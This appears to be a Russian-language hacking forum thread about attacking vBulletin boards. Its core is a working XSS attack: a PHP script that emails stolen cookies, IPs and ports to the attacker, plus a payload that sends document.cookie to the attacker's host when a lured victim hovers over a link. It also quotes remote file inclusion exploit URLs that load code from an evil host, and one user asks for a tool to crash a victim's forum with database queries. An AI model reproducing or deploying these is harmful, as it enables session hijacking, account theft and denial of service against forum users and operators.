работает отлично! Code: ( 1 ) -------------------------------------------------------------------- Name file: exploit.php -------------------------------------------------------------------- <?php $ip_adresse = $_SERVER['REMOTE_ADDR']; if(!empty($ip_adresse)) { echo 'il tuo ip и: ',$ip_adresse; } else { echo 'Impossible d\'afficher l\'IP'; } ?> <a href="log.php"></a><? $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; else $visitor_info = $REMOTE_HOST; $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; $x1=`host $REMOTE_ADDR|grep Name`; $x2=$REMOTE_PORT; ?> <?php $cookie = $_GET['c']; ?> <?php $myemail = "YOUR ADDRESS E-MAIL"; $today = date("l, F j, Y, g:i a") ; $subject = "Xss Vbulletin" ; $message = "Xss: Hacking Ip: $ip_adresse Cookie: $cookie Url: $base porta usata: $xx1 remote port: $x2 Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?> -------------------------------------------------------------------- <?php $myemail = "YOUR ADDRESS E-MAIL"; -------------------------------------------------------------------- ( 2 ) -------------------------------------------------------------------- Name file: image.gif -------------------------------------------------------------------- <pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > -------------------------------------------------------------------- location="http://YOUR ADDRESS WEB.com -------------------------------------------------------------------- ( 3 ) -------------------------------------------------------------------- Like Using -------------------------------------------------------------------- 1° new thread 2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> ' 3° Submit 4° It waits for --------------------------------------------------------------------
чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS сплойт гавно
Всё бы здорово если бы не html on. Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это Code: Remote File Inclusion in VBulletin ImpEx Date : 12 / 4 / 2006 Software : VBulletin ImpEx version : VBulletin 3.5.1 VBulletin 3.5.2 VBulletin 3.5.4 The bug reside in : ImpExModule.php ImpExController.php ImpExDisplay.php Exploit : (1) www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id (2) www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id (3) www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id Discovery by : Dr.Jr7 GreeTz : special greet to Qptan & Mr.SNAKE & trooq and to my all frinds in www.lezr.com/vb see u :}
а ниукого хотябы досера нету? чтобы прокси обращались к поиску, а главное был бы sql запрос и тогда у жертвы (в моем случае)повиснит форум т.к ограничено 20.000 запросами к БД
Я должен на форуме в сообщении написать это <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' > И залить сплоит к себе ,так???
Говно! хтмл практически у всех отключен! А Ipmex сплоит тож гавно, импех тока когда с движка форума каковонить пережаешь на воблу, потом этот скрипт все удаляют!